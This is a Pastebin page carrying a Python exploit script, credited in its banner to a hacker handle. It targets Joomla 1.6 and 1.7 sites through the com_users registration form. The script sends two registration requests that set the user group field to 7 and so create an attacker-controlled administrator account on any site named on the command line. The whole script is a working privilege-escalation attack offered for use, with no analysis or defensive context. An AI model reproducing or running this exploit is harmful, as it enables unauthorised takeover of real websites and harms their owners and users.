Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- #coded by el ZinDYanII-tN (2013-2014)
- #free toolZ
- import requests as sec4ever, re, urllib, sys, os
- from threading import Thread
- from time import sleep
- def cls():
- os.system(['clear','cls'][os.name =='nt'])
- cls()
- home = '''
- |=========================================================================|
- |=========================================================================|
- |===========================[ el ZinDYanII-tN ]===========================|
- |=========================================================================|
- |=========================================================================|
- | |
- | dP""b8 dP"Yb 8b d8 fucked by 88 88 .dP"Y8 888888 88""Yb |
- | dP `" dP Yb 88b d88 el ZinDYanII-tN 88 88 `Ybo." 88__ 88__dP |
- | Yb Yb dP 88YbdP88 Y8 8P o.`Y8b 88"" 88"Yb |
- | YboodP YbodP 88 YY 88 ooooooooooooooo `YbodP' 8bodP' 888888 88 Yb |
- | |
- |=========================================================================|
- |=============[ https://www.facebook.com/XelzindyaniiX ]================|
- |=========================================================================|
- |+++++[ Joomla Version 1.6 and 1.7 Com_User Auto Exploit add admin ]+++++|
- |=========================================================================|
- |=========================================================================|
- '''
- print home
- pwd2 = 'fio3jfiej9cewc9c9w0eufew9u'
- def one(target,pwd1,pwd2,email):
- # Wrong Password
- x1 = xsec.get(target+'/index.php?option=com_users&view=registration')
- token = re.findall('type="hidden" name="(.*?)" value="1"', x1.text)
- post = {}
- post["jform[name]"] = 'SunDi3yansyah'
- post["jform[username]"] = user
- post["jform[password1]"] = pwd1
- post["jform[password2]"] = pwd2
- post["jform[email1]"] = email
- post["jform[email2]"] = email
- post["jform[groups][]"] = "7"
- post["option"] = "com_users"
- post["task"] = "registration.register"
- post[token[0]] = "1"
- p1 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))
- x2 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')
- def exploit(target,pwd1,pwd2,email):
- # Wrong Password
- x3 = xsec.get(target+'/index.php?option=com_users&view=registration')
- token = re.findall('type="hidden" name="(.*?)" value="1"', x3.text)
- post = {}
- post["jform[name]"] = 'SunDi3yansyah'
- post["jform[username]"] = user
- post["jform[password1]"] = pwd1
- post["jform[password2]"] = pwd1
- post["jform[email1]"] = email
- post["jform[email2]"] = email
- post["jform[groups][]"] = "7"
- post["option"] = "com_users"
- post["task"] = "registration.register"
- post[token[0]] = "1"
- p2 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))
- x4 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')
- xsec = sec4ever.session()
- if len(sys.argv) == 5:
- target = sys.argv[1]
- user = sys.argv[2]
- pwd1 = sys.argv[3]
- email = sys.argv[4]
- one(target,pwd1,pwd2,email)
- ex = exploit(target,pwd1,pwd2,email)
- print ' * exploit don opene http://python-root.blogspot.com \n * Username: '+user+' & Password: '+pwd1
- else:
- print "Usage: python exploit.py http://site.com/ username password email"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement